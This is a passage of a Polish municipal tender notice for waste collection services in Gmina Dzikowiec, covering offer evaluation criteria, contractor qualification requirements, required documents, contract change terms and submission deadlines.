najkorzystniejszej oferty Zamawiający stosować będzie następujące kryteria oceny ofert:<br/><br/>Cena: 60% = 60 pkt<br/>Akcje promujące: 40% = 40 pkt<br/>	Kryterium „Cena (C)&#34; będzie rozpatrywana na podstawie ceny brutto za wykonanie przedmiotu zamówienia, podanej przez Wykonawcę na Formularzu Oferty.<br/>	Zamawiający ofercie o najniżej cenie spośród ofert ocenianych przyzna 60 punktów, <br/>a każdej następnej zostanie przyporządkowana liczba punktów proporcjonalnie mniejsza, według wzoru:<br/>C=C_min/C_bad x 60 %<br/>gdzie<br/>Cmin - cena ofertowa brutto oferty najtańszej<br/>Cb -cena ofertowa brutto oferty badanej<br/>W tym kryterium można uzyskać maksymalnie 60 punktów. Przyznane punkty zostaną zaokrąglone do dwóch miejsc po przecinku.<br/>	Kryterium „Akcje promujące (Pap)” będzie rozpatrywana na podstawie akcji promującej selektywne zbieranie odpadów w placówkach oświatowych na terenie gminy Dzikowiec – waga 40% (Pap)<br/>Liczba punktów z poszczególnych ofert przyznana zostanie wg następujących zasad:<br/>	Wykonawca zobowiąże się do wykonania akcji promujących selektywne zbieranie odpadów w sześciu placówkach oświatowych na terenie gminy Dzikowiec – <br/>40 punktów;<br/>	Wykonawca zobowiąże się do wykonania akcji promujących selektywne zbieranie odpadów w sześciu lub pięciu placówkach oświatowych na terenie gminy Dzikowiec – 20 punktów;<br/>	Wykonawca zobowiąże się do wykonania akcji promujących selektywne zbieranie odpadów w czterech lub trzech placówkach oświatowych na terenie gminy Dzikowiec – 10 punktów; <br/>	Wykonawca nie zobowiąże się lub zobowiąże się do wykonania akcji promujących selektywne zbieranie odpadów w dwóch lub jednej placówkach oświatowych na terenie gminy Dzikowiec – 0 punktów.<br/>Akcje promujące selektywne zbieranie odpadów w placówkach oświatowych na terenie Gminy Dzikowiec mogą być przeprowadzone w dowolnej formie ( w szczególności: konkursów z nagrodami, lekcji pokazowych, warsztatów itp.), wcześniej ustalonej <br/>z Zamawiającym. Akcje promujące selektywne zbieranie odpadów muszą zostać wykonane nie później niż do końca kwietnia 2022 r. Wykonawca w terminie do 20-tego dnia kolejnego miesiąca ( tj. 20 maja 2022 r.) przedłoży Zamawiającemu dokumentację ( raporty, sprawozdania itp. ) z przeprowadzenia w/w akcji.<br/>5.	Za najkorzystniejszą zostanie uznana oferta Wykonawcy (ON), który spełni wszystkie postawione w niniejszej SWZ warunki oraz uzyska łącznie największą liczbę punktów stanowiących sumę punktów przyznanych w ramach każdego z podanych kryteriów, wyliczoną zgodnie z poniższym wzorem:<br/>Oferta najkorzystniejsza (ON) = (C) + (Pap)<br/>gdzie:<br/>C - liczba punktów przyznana ofercie ocenianej w kryterium „Cena&#34;<br/>Pap - liczba punktów przyznana ofercie ocenianej w kryterium „Akcji promującej&#34;<br/>Najkorzystniejsza oferta to oferta przedstawiająca najkorzystniejszy stosunek jakości do ceny lub do kosztu lub oferta z najniższą ceną lub kosztem.<br/>Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny lub kosztu i innych kryteriów oceny ofert, zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę <br/>w kryterium o najwyższej wadze.<br/>W przypadku braku zgody, o której mowa w pkt. 11, zamawiający zwraca się <br/>o wyrażenie takiej zgody do kolejnego wykonawcy, którego oferta została najwyżej oceniona, chyba że zachodzą przesłanki unieważnienia postępowania.<br/>Niezwłocznie po wyborze najkorzystniejszej oferty zamawiający informuje równocześnie Wykonawców, którzy złożyli ofertę, o:<br/>Wyborze najkorzystniejszej oferty, podając nazwę albo imię i nazwisko, siedzibę albo miejsce zamieszkania, jeżeli jest miejscem wykonywania działalności wykonawcy, którego ofertę wybrano, oraz nazwy albo imiona i nazwiska, siedziby albo miejsca zamieszkania, jeżeli są miejscem wykonywania działalności wykonawców, którzy złożyli ofertę, a także punktację przyznaną ofertom w każdym kryterium oceny ofert <br/>i łączną punktację,<br/>Wykonawcach, których oferty zostały odrzucone<br/>- podając uzasadnienie faktyczne i prawne.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Akcje promujące</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają<br/> wykluczeniu oraz spełniają określone przez Zamawiającego warunki udziału <br/> w postępowaniu.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki <br/> dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym: <br/>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny. <br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej,<br/>o ile wynika to z odrębnych przepisów: <br/>Zamawiający uzna warunek za jeżeli Wykonawca:<br/>a)	jest wpisany do rejestru działalności regulowanej prowadzonego przez Wójta Gminy Dzikowiec w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości z terenu gminy Dzikowiec, zgodnie z wymogami ustawy z dnia 13 września 1996r. o utrzymaniu czystości i porządku w gminie (Dz. U. z 2021 poz. 888 ze zm.), <br/>b)	wpis do rejestru BDO dokonywany na podstawie ustawy z dnia 14 grudnia 2012 r. o odpadach (t.j. Dz.U. z 2021 r., poz. 779 ze zm.)<br/>c)	posiada umowę z RIPOK na przyjęcie zmieszanych odpadów komunalnych,<br/>d)	zezwolenie na prowadzenie działalności w zakresie zbierania i transportu odpadów objętych niniejszym zezwoleniem, zgodnie z ustawą o odpadach z dnia 14 grudnia 2012 r. (Dz.U. z 2020 r. poz. 797 z późn. zm.)<br/>3)	sytuacji finansowej lub ekonomicznej:<br/> Wykonawca potwierdzi spełnienie warunku jeżeli wykaże, że jest ubezpieczony od odpowiedzialności cywilnej (suma gwarancyjna co najmniej 200 000,00 zł – słownie: dwieście tysięcy złotych 00/100) w zakresie prowadzonej działalności gospodarczej. Okres ważności polisy lub innego dokumentu ubezpieczenia musi obejmować co najmniej przewidziany przez zamawiającego w SWZ okres realizacji zadania. Jeżeli ważność polisy wygasa przed terminem wykonania zamówienia, wykonawca winien dołączyć do oferty oświadczenie o przedłożeniu zamawiającemu aktualnego dokumentu ubezpieczenia niezwłocznie po wygaśnięciu polisy/innego dokumentu ubezpieczenia.<br/>4)	zdolności technicznej lub zawodowej:<br/>Wykonawca spełni warunek, jeżeli wykaże że:<br/>a) wykonał, a w przypadku świadczeń okresowych lub ciągłych wykonuje w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie co najmniej 1 usługę polegającą na odbieraniu odpadów komunalnych z nieruchomości w ilości nie mniejszej niż 350 Mg , <br/> b) dysponuje : <br/>•	co najmniej 2 pojazdami przystosowanymi do odbierania zmieszanych odpadów komunalnych, <br/>•	co najmniej 1 pojazdem przystosowanym do odbierania odpadów komunalnych <br/>z nieruchomości o utrudnionym dojeździe, <br/>•	co najmniej 2 pojazdami przystosowanymi do odbierania selektywnie zebranych odpadów komunalnych, <br/>•	co najmniej 1 pojazdem do odbierania odpadów komunalnych bez funkcji kompaktującej.<br/>W/w pojazdy muszą być: <br/>	pojazdami trwale i czytelnie oznakowanymi w widocznym miejscu nazwą firmy oraz danymi adresowymi i numerem telefonu podmiotu odbierającego odpady komunalne od właścicieli nieruchomości, <br/>	wszystkie pojazdy do odbioru i transportu odpadów muszą spełnić co najmniej normy emisji spalin EURO 5 wg Europejskiego standardu emisji spalin,<br/>	wyposażone w system monitoringu bazującego na systemie pozycjonowania satelitarnego, umożliwiającego trwałe zapisywanie, przechowywanie<br/>i odczytywanie danych o położeniu pojazdu i miejscach postoju oraz czujników zapisujących dane o miejscach wyładunku odpadów.<br/>c) dysponuje w celu wykonania zamówienia publicznego bazą magazynowo –transportową: <br/>	usytuowaną w gminie, z któ rej terenu odbiera te odpady lub w odległości nie <br/> większej niż̇ 60 km od granicy tej gminy, <br/>	usytuowaną na terenie, do którego posiada tytuł prawny, wyposażona <br/>w miejsce przeznaczone do parkowania pojazdów, zabezpieczone przed emisją zanieczyszczeń́ do gruntu,<br/>	wyposażoną w legalizowaną samochodową wagę najazdową, w przypadku gdy na terenie bazy następuje magazynowanie odpadów,<br/>	wyposażoną w urządzenia lub systemy zapewniające zagospodarowanie wód opadowych i ścieków przemysłowych,<br/>	wyposażoną w pomieszczenia socjalne dla pracowników odpowiadające liczbie zatrudnionych osób,<br/>	na terenie, której znajduje się punkt konserwacji i napraw pojazdów oraz miejsce do mycia i dezynfekcji pojazdów zgodnie z rozporządzeniem Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań́ <br/>w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz.U. z 2013r.poz. 122).<br/>W przypadku gdy jakakolwiek wartość dotycząca powyższych warunków wyrażona będzie w walucie obcej, Zamawiający przeliczy tę wartość w oparciu o średni kurs walut Narodowego Banku Polskiego (dalej: NBP) dla danej waluty z dnia, w którym nastąpi postępowaniu publikacja przedmiotowego postępowania. Jeżeli w tym dniu nie będzie opublikowany średni kurs NBP, Zamawiający przyjmie średni kurs z ostatniego dnia przed dniem publikacji.<br/>Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej dopuszcza łączne spełnianie warunku przez Wykonawców.<br/>Ocena spełniania warunków udziału w postępowaniu odbywać się będzie na podstawie wymaganych dokumentów i oświadczeń według zasady: spełnia - nie spełnia.<br/>2.	Zamawiający wymaga od wykonawcy złożenia oświadczenia, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz.U. z 2019 r. poz. 369), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenie <br/>o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczeni do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej. Wzór oświadczenia stanowi - Załącznik nr 4 do SWZ.<br/>3.	W trybie podstawowym oświadczenie, o którym mowa w art. 125 ust. 1, wykonawca dołącza do oferty składanej w odpowiedzi na ogłoszenie o zamówieniu.<br/>4.	Do wniosku o dopuszczenie do udziału w postępowaniu albo do oferty wykonawca dołącza oświadczenie o niepodleganiu wykluczeniu, spełnianiu warunków udziału <br/>w postępowaniu lub kryteriów selekcji, w zakresie wskazanym przez zamawiającego.<br/>5.	Oświadczenie, o którym mowa w art. 125 ust. 1 Ustawy Pzp, potwierdzający brak podstaw wykluczenia, spełnianie warunków udziału w postępowaniu lub kryteriów selekcji, odpowiednio na dzień składania wniosków o dopuszczenie do udziału <br/>w postępowaniu albo ofert, tymczasowo zastępujący wymagane przez zamawiającego podmiotowe środki dowodowe.<br/>6.	W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa w art. 125 ust 1 Ustawy Pzp, składa każdy <br/>z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu lub kryteriów selekcji w zakresie, <br/>w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu lub kryteriów selekcji.<br/>7.	Wykonawca, w przypadku polegania na zdolnościach lub sytuacjach podmiotów udostępniających zasoby, przedstawia, wraz z oświadczeniem, o którym mowa w art. 125 ust. 1 Pzp, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu lub kryteriów selekcji, w zakresie, w jakim wykonawca powołuje się na jego zasoby.<br/>8.	Zamawiający wzywa wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, jeżeli wymagał ich złożenia w ogłoszeniu <br/>o zamówieniu lub dokumentach zamówienia, aktualnych na dzień składania, chyba że zamawiający jest w posiadaniu lub ma dostęp do tych podmiotowych środków dowodowych.<br/>9.	Jeżeli jest to niezbędne do zapewnienia odpowiedniego przebiegu postępowania <br/>o udzielenie zamówienia, zamawiający może na każdym etapie postępowania, w tym na etapie składania ofert podlegających negocjacjom lub niezwłocznie po ich złożeniu, wezwać wykonawców do złożenia wszystkich lub niektórych podmiotowych środków dowodowych, jeżeli wymagał ich złożenia w ogłoszeniu o zamówieniu lub dokumentach zamówienia, aktualnych na dzień ich złożenia.<br/>10.	Jeżeli zachodzą uzasadnione podstawy do uznania, że złożone uprzednio podmiotowe środki dowodowe nie są już aktualne, zamawiający może w każdym czasie wezwać wykonawcę lub wykonawców do złożenia wszystkich lub niektórych podmiotowych środków dowodowych, aktualnych na dzień ich złożenia.<br/>11.	Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, <br/>w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. <br/>o informatyzacji działalności podmiotów realizujących zadania publiczne, o ile wykonawca wskazał w oświadczeniu, o którym mowa w art. 125 ust. 1 Ustawy Pzp, dane umożliwiające dostęp do tych środków.<br/>12.	Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które zamawiający posiada, jeżeli wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i aktualność.<br/>13.	Jeżeli wykonawca nie złożył oświadczenia, o którym mowa w art. 125 ust. 1, podmiotowych środków dowodowych, innych dokumentów lub oświadczeń składanych w postępowaniu lub są one niekompletne lub zawierają błędy, zamawiający wzywa wykonawcę odpowiednio do ich złożenia, poprawienia lub uzupełnienia <br/>w wyznaczonym terminie, chyba że:<br/>1)	Wniosek o dopuszczenie do udziału w postępowaniu albo oferta wykonawcy podlegają odrzuceniu bez względu na ich złożenie, uzupełnienie lub poprawienie lub<br/>2)	Zachodzą przesłanki unieważnienia postępowania. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie o spełnianiu warunków udziału w postępowaniu oraz o braku podstaw do wykluczenia z postępowania - oświadczenie wstępne - zgodnie ze wzorem stanowiącym załącznik nr 2 i 3 do SWZ. <br/>2. Informacje zawarte w oświadczeniu, o którym mowa w ust. 1 stanowią wstępne potwierdzenie, że Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu.<br/>3. Zamawiający wzywa wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, jeżeli wymagał ich złożenia w ogłoszeniu <br/>o zamówieniu lub dokumentach zamówienia, aktualnych na dzień złożenia podmiotowych środków dowodowych.<br/>Na wezwanie Zamawiającego w celu wykazania braku podstaw do wykluczenia <br/>z postępowania Wykonawca, którego oferta zostanie najwyżej oceniona zostanie zobowiązany do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni następujących podmiotowych środków dowodowych:<br/>6.1. oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), <br/>z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek <br/>o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału <br/>w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej: załącznik nr 4 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">4.	Podmiotowe środki dowodowe wymagane od wykonawcy:<br/>Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, aktualnych na dzień złożenia podmiotowych środków dowodowych, t.j.:<br/>A. W celu potwierdzenia spełniania przez Wykonawcę warunków udziału <br/>w postępowaniu dotyczących uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej Zamawiający żąda następujących podmiotowych środków dowodowych: <br/>1) odpowiednie zezwolenia, licencje, koncesje lub potwierdzenie wpisu do rejestru działalności regulowanej, jeżeli ich posiadanie jest niezbędne do świadczenia określonych usług w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, tj.: <br/>a) wpis do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości prowadzonego przez Wójta Gminy Dzikowiec zgodnie z przepisami ustawy o utrzymaniu czystości i porządku <br/>w gminach z dnia 13 września 1996 r. <br/>b) wpis do rejestru BDO dokonywany na podstawie ustawy z dnia 14 grudnia 2012 r. o odpadach <br/>c) umowa z RIPOK na przyjęcie zmieszanych odpadów komunalnych;<br/>d) zezwolenie na prowadzenie działalności w zakresie zbierania i transportu odpadów objętych niniejszym zezwoleniem, zgodnie z ustawą o odpadach z dnia 14 grudnia 2012 r. <br/>B. W celu potwierdzenia spełniania przez Wykonawcę warunków udziału <br/>w postępowaniu dotyczących sytuacji ekonomicznej lub finansowej Zamawiający żąda następujących podmiotowych środków dowodowych: <br/>1) dokumentów potwierdzających, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej <br/>z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia (suma gwarancyjna co najmniej 200 000,00 zł – słownie: dwieście tysięcy złotych 00/100). Jeżeli z uzasadnionej przyczyny Wykonawca nie może złożyć wymaganych przez Zamawiającego podmiotowych środków dowodowych, o których mowa w pkt. 1, Wykonawca składa inne podmiotowe środki dowodowe, które w wystarczający sposób potwierdzają spełnianie opisanego przez Zamawiającego warunku udziału w postępowaniu dotyczącego sytuacji ekonomicznej lub finansowej.<br/>C. W celu potwierdzenia spełniania przez Wykonawcę warunków udziału <br/>w postępowaniu dotyczących zdolności technicznej lub zawodowej, Zamawiający żąda następujących podmiotowych środków dowodowych: <br/>1) wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie Wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy, licząc wstecz od dnia, w którym upływa termin składania ofert- Załącznik nr 5 do SWZ; <br/>2) wykaz narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych Wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami – Załącznik nr 6 do SWZ;<br/>W odniesieniu do pojazdów posiadających dźwignik zamontowany na pojeździe (samochody bramowe do przewozu kontenerów lub samochody z żurawiem przenośnym) należy załączyć decyzje UDT zezwalające na użytkowanie urządzenia transportu bliskiego.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> . Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. <br/>2. W przypadku, o którym mowa w ust. 1, wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo należy dołączyć do oferty. <br/>3. Przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <br/>4. W przypadku, o którym mowa w art. 117 ust. 2 i 3 ustawy Pzp , Wykonawcy wspólnie ubiegający się o udzielenie zamówienia składają oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy (należy wypełnić treść oświadczenia zawartego w formularzu ofertowym).<br/> 5. Jeżeli została wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, zamawiający żąda przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Projektowane postanowienia umowy w sprawie zamówienia publicznego, które zostaną wprowadzone do treści tej umowy, określone zostały w Załączniku nr 8 do Specyfikacji Warunków Zamówienia. <br/>2.	Zamawiający oświadcza, iż przewiduje możliwość zmian Umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia wymienionych w niniejszym paragrafie okoliczności, przy czym zmiany te mogą dotyczyć: <br/>3.	Zakres, charakter oraz warunki wprowadzenia zmian w zawartej umowie. Zmiana postanowień Umowy w stosunku do treści oferty Wykonawcy jest możliwa poprzez:<br/>a)	zmianę sposobu wykonania przedmiotu Umowy; <br/>b)	zmianę zakresu przedmiotu Umowy;<br/>c)	zmianę wynagrodzenia Wykonawcy lub zmianę terminu/terminów określonych <br/>w umowie, a zmiany dokonywane są w celu prawidłowej realizacji zadań objętych przedmiotem umowy i osiągnięcia zamierzonych przez Zamawiającego rezultatów celów; <br/>4.	Zmiana postanowień Umowy w stosunku do treści oferty Wykonawcy jest możliwa w sytuacji gdy:<br/>a)	nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia powodująca, że realizacja przedmiotu Umowy w niezmienionej postaci stanie się niecelowa. Zmiana tych przepisów musi wywierać bezpośredni wpływ na realizację przedmiotu umowy i może prowadzić do modyfikacji wyłącznie tych zapisów umowy, do których się odnosi;<br/>b) wystąpią uzasadnione przyczyny spowodowane czynnikami niezależnymi od Wykonawcy, które mają wpływ na jakość realizacji zamówienia/ uniemożliwiają realizację zamówienia w pierwotnie określony sposób;<br/>c) konieczność wprowadzenia zmian postanowień Umowy w stosunku do treści oferty Wykonawcy będzie następstwem zmian wprowadzonych w: <br/>- ustaleniach dokonanych między Zamawiającymi działającymi wspólnie o ile zmiany te będą miały bezpośredni wpływ na realizację umowy. Zmiany te mogą dotyczyć wyłącznie tych zapisów umowy, na który wpływ miały zmiany, o których mowa powyżej, m.in. zmiana może prowadzić do wydłużenia terminu realizacji umowy;<br/>5. Zakazuje się zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, chyba że konieczność takich zmian wynika z wystąpienia następujących okoliczności:<br/>5.1.	Zmiana harmonogramu odbioru odpadów komunalnych - w przypadku: <br/>a)	wystąpienia warunków atmosferycznych uniemożliwiających zbieranie odpadów, np. intensywne opady śniegu, opady deszczu, marznącego deszczu, oblodzenia, zawieje <br/>i zamiecie;<br/>b)	gdy usługi objęte umową zostały wstrzymane przez właściwe organy, co uniemożliwi terminowy odbiór odpadów;<br/>c)	w przypadku stwierdzenia, że okoliczności związane z wystąpieniem COVID-19 mogą wpłynąć na realizację usługi zgodnie z harmonogramem odbioru odpadów. <br/>W przypadku wystąpienia którejkolwiek z wymienionych wyżej okoliczności <br/>w zakresie mającym wpływ na przebieg realizacji zamówienia harmonogram może ulec zmianie.<br/>5.2	Organizacyjnej polegającej na: zmianie osób, podwykonawców, grup wykonawców <br/>i innych podmiotów współpracujących przy realizacji zamówienia pod warunkiem, że ich uprawnienia, potencjał ekonomiczny, wykonawczy i doświadczenie nie są gorsze od tych, jakie posiadają podmioty zamieniane. Zmiany te mogą nastąpić<br/>z przyczyn organizacyjnych pod warunkiem, że osoby podwykonawcy, grupy wykonawców i innych podmiotów spełniają wszystkie wymogi wynikające z SWZ <br/>i złożonej oferty. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-19 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma zakupowa Gminy Dzikowiec</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-19 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-18</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Stosowanie do art. 95 ust. 1 i 2 ustawy Pzp Zamawiający wymaga zatrudnienia przez Wykonawcę lub Podwykonawców na podstawie stosunku pracy osób wykonujących <br/>w ramach realizacji usługi czynności polegających na wykonywaniu pracy w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. – kodeks pracy związanej z: <br/>a) kierowaniem pojazdami typu śmieciarka, <br/>b) porządkowaniem i załadunkiem odpadów na śmieciarkę, <br/>c) pracami administracyjnymi związanymi z obsługą zamówienia. <br/>2. Wykonawca gwarantuje, że osoby wykonujące przedmiot zamówienia w zakresie określonym w pkt. 1) będą zatrudnione na podstawie stosunku pracy w rozumieniu Kodeksu pracy. Obowiązek realizacji przedmiotu zamówienia przy pomocy osób zatrudnionych na podstawie stosunku pracy dotyczy również realizacji zamówienia przy pomocy Podwykonawców. <br/>3. Wykonawca przedłoży Zamawiającemu w terminie 10 dni od podpisania umowy poświadczone za zgodność z oryginałem kopie umów o pracę zatrudnionych pracowników - zawierających informacje, w tym dane osobowe, niezbędne do weryfikacji zatrudnienia na podstawie umowy o pracę, w szczególności imię i nazwisko zatrudnionego pracownika, datę zawarcia umowy o pracę, rodzaj umowy o pracę i zakres obowiązków pracownika. <br/>4. W celu weryfikacji zatrudniania przez Wykonawcę lub Podwykonawcę na podstawie umowy o pracę osób wykonujących wskazane w pkt. 1) czynności w zakresie realizacji zamówienia Zamawiający ma prawo żądać przedłożenia dokumentów potwierdzających zatrudnienie w terminie przez siebie wyznaczonym w szczególności: <br/>a) oświadczenia zatrudnionego pracownika,<br/>b) oświadczenia Wykonawcy lub Podwykonawcy o zatrudnieniu pracownika na podstawie umowy o pracę, <br/>c) poświadczonej za zgodność z oryginałem kopii umowy o pracę zatrudnionego pracownika,<br/> d) innych dokumentów − zawierających informacje, w tym dane osobowe, niezbędne do weryfikacji zatrudnienia na podstawie umowy o pracę, w szczególności imię i nazwisko zatrudnionego pracownika, datę 